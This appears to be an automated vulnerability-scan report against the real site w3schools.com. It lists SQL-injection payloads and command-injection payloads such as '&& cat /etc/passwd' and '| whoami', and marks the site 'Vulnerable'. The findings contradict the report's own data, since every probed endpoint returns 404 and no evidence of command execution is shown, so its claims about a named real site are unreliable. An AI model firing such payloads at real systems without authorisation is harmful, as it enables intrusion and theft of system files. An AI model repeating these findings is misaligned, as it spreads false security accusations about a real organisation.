Vulnerability Assessment Report for https://www.w3schools.com/
================================================================================
Report Generated on: 2024-11-03 09:59:56
================================================================================
Detected Endpoints:
--------------------------------------------------------------------------------
  - https://www.w3schools.com//api/v1/resource - Status Code: 404
  - https://www.w3schools.com//login - Status Code: 404
  - https://www.w3schools.com//register - Status Code: 404
  - https://www.w3schools.com//search - Status Code: 404
  - https://www.w3schools.com//admin - Status Code: 404
  - https://www.w3schools.com//dashboard - Status Code: 404
  - https://www.w3schools.com//help - Status Code: 404
  - https://www.w3schools.com//status - Status Code: 404
  - https://www.w3schools.com//users - Status Code: 404
  - https://www.w3schools.com//products - Status Code: 404
--------------------------------------------------------------------------------

Test: SQL Injection
--------------------------------------------------------------------------------
  - Payload: ' OR '1'='1
    Status: Vulnerable
    Reason: Error messages indicating SQL syntax issues.
  - Payload: ' OR 1=1 --
    Status: Vulnerable
    Reason: Error messages indicating SQL syntax issues.
  - Payload: ' OR 'a'='a' --
    Status: Vulnerable
    Reason: Error messages indicating SQL syntax issues.

Test: XSS
--------------------------------------------------------------------------------
  - No vulnerabilities found.

Test: Directory Traversal
--------------------------------------------------------------------------------
  - No vulnerabilities found.

Test: IDOR
--------------------------------------------------------------------------------
  - Payload: Accessing /users/1/profile
    Status: Secure
    Reason: No unauthorized access detected.
  - Payload: Accessing /users/2/profile
    Status: Secure
    Reason: No unauthorized access detected.

Test: CSRF
--------------------------------------------------------------------------------
  - No vulnerabilities found.

Test: Command Injection
--------------------------------------------------------------------------------
  - Payload: ; ls
    Status: Vulnerable
    Reason: Command execution detected in response.
  - Payload: && cat /etc/passwd
    Status: Vulnerable
    Reason: Command execution detected in response.
  - Payload: | whoami
    Status: Vulnerable
    Reason: Command execution detected in response.

Test: HTTP Header Injection
--------------------------------------------------------------------------------
  - No vulnerabilities found.
================================================================================
End of Report
